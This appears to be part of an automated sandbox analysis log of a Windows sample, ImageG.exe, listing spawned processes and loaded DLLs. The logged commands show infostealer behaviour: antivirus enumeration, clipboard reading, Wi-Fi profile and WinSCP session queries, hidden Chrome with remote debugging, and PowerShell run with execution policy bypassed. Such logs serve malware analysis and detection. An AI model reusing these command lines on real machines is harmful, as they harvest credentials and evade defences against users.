        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /PID 9048 /FJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process where processid=7896 get ExecutablePath
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe NET SESSION
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 SESSION
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2232,i,12830479303068342978,11409588197743530798,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2248 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: iconcodecservice.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ffmpeg.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: kbdus.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: windows.ui.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: windowmanagementapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: inputhost.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mscms.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: coloradapterclient.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mmdevapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: quartz.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: qcap.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: photometadatahandler.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: windowscodecs.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: mfsrcsnk.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: mfplat.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: rtworkq.dll
        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
